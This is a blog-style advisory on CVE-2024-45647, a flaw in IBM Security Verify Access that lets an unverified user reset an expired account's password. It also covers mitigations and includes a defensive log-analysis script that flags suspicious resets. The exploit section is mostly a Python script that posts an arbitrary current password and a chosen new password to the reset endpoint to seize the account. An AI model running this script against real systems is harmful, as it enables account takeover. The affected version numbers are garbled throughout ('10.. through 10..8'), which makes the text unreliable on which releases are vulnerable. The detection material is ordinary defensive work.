CVE-2024-45647 - IBM Security Verify Access Password Reset Vulnerability Exploited
A dangerous security flaw has been discovered in IBM’s Security Verify Access products, affecting versions 10.. through 10..8, both regular and Docker editions. Known officially as CVE-2024-45647, this issue lets an unverified user reset the password of a user whose account is expired, without needing to know the old password. Attackers could potentially hijack user accounts, especially those of users who haven’t recently updated or monitored their credentials.
This exclusive post will walk you through how the vulnerability works, the code behind it, how attackers might exploit it, and what you can do to protect yourself.
What is IBM Security Verify Access?
IBM Security Verify Access (formerly known as IBM Security Access Manager or ISAM) helps organizations control access to web, mobile, and cloud applications. It’s used in many industries for single sign-on (SSO), multi-factor authentication, and risk-based access control.
The Vulnerability
CVE-2024-45647 is a logic flaw in the password reset workflow. When a user’s password expires, the application should verify the user’s identity before allowing them to reset it. However, a bug in versions 10.. to 10..8 allows anyone to reset an expired user’s password—even without knowing the current password or passing proper verification.
IBM Security Verify Access Docker: 10.. to 10..8
See the official IBM Security Bulletin for details.
Exploiting CVE-2024-45647
This bug can be exploited over the web UI, API, or mobile clients connected to an affected Verify Access deployment.
Here’s a simplistic Python example exploiting the reset endpoint:

import requests

target_url = "https://vulnerable-verify-access.example.com/expired_password_reset"
expired_username = "targetuser"
new_password = "P@sswrdNEW!"

# Normally requires current password, but any input works due to the bug.
payload = {
    "username": expired_username,
    "currentPassword": "anything",
    "newPassword": new_password
}

r = requests.post(target_url, json=payload, verify=False)

if "success" in r.text or r.status_code == 200:
    print(f"Password for '{expired_username}' changed to '{new_password}'!")
else:
    print("Exploit failed or target not vulnerable.")
Note: The exact parameter names and endpoints may differ in your deployment, but the logic stays similar.
Real-World Risks
- Attackers without any legitimate credentials can reactivate expired accounts by simply resetting their passwords. This is especially serious for organizations where old or unused accounts aren’t actively monitored.
- Disruptive insiders could target privileged accounts that have expired, regain access, and escalate attack impact.
Mitigations
IBM has released patches and updates to fix this issue. If you can’t upgrade immediately:
1. Monitor password resets: Alert on password changes to expired accounts.
2. Restrict reset endpoints: Block public/anonymous access until patched.
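One way to implement the first mitigation, as an added example that is not from this post or from IBM: a small detector that reads password-reset audit events, checks them against a list of accounts whose passwords had expired, and flags any reset that was not preceded by a successful identity verification from the same user. The JSON-lines format, the field names and the event names are assumptions; map them to your deployment's own audit schema.

```python
import json
from datetime import datetime, timedelta

# Constructed sample audit events (JSON lines). Field and event names are
# assumptions, not the product's real audit schema.
SAMPLE_LOG = """
{"ts": "2025-01-20T09:00:00Z", "event": "auth_success", "user": "carol", "src": "10.0.0.7"}
{"ts": "2025-01-20T09:01:00Z", "event": "password_reset", "user": "carol", "src": "10.0.0.7"}
{"ts": "2025-01-20T10:00:00Z", "event": "auth_success", "user": "alice", "src": "10.0.0.5"}
{"ts": "2025-01-20T10:00:30Z", "event": "password_reset", "user": "alice", "src": "10.0.0.5"}
{"ts": "2025-01-20T11:15:00Z", "event": "password_reset", "user": "svc_backup", "src": "203.0.113.9"}
{"ts": "2025-01-20T11:16:00Z", "event": "password_reset", "user": "bob", "src": "203.0.113.9"}
"""

# Accounts whose passwords had expired at the time of the log (constructed).
EXPIRED_ACCOUNTS = {"carol", "svc_backup", "bob"}

# A reset counts as verified if the same user authenticated within this window.
VERIFY_WINDOW = timedelta(minutes=5)


def parse_events(text):
    """Parse JSON-lines audit text into dicts with a datetime 'ts', oldest first."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def find_suspicious_resets(events, expired_accounts, window=VERIFY_WINDOW):
    """Return resets of expired accounts that lack a recent auth_success for that user."""
    last_auth = {}
    alerts = []
    for ev in events:
        if ev["event"] == "auth_success":
            last_auth[ev["user"]] = ev["ts"]
        elif ev["event"] == "password_reset" and ev["user"] in expired_accounts:
            seen = last_auth.get(ev["user"])
            if seen is None or ev["ts"] - seen > window:
                alerts.append({"user": ev["user"], "ts": ev["ts"], "src": ev["src"],
                               "reason": "reset of expired account without prior verification"})
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_resets(parse_events(SAMPLE_LOG), EXPIRED_ACCOUNTS):
        print(f"ALERT {a['ts'].isoformat()} user={a['user']} src={a['src']}: {a['reason']}")
```

In the constructed sample, carol's reset is preceded by a verification and alice's account is not expired, so only the two resets from 203.0.113.9 are flagged.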
References
- IBM Security Bulletin: CVE-2024-45647
- IBM Security Verify Access Product Page
- NVD - CVE-2024-45647
Conclusion
CVE-2024-45647 is a serious logic bug affecting how IBM Security Verify Access resets passwords for expired users. By skipping standard verification, attackers can reset and take over affected accounts without prior access. Patch your systems as soon as possible, keep an eye on reset logs, and don’t ignore those old or expired accounts—they’re now a high-value target.
Timeline
Published on: 01/20/2025 15:15:07 UTC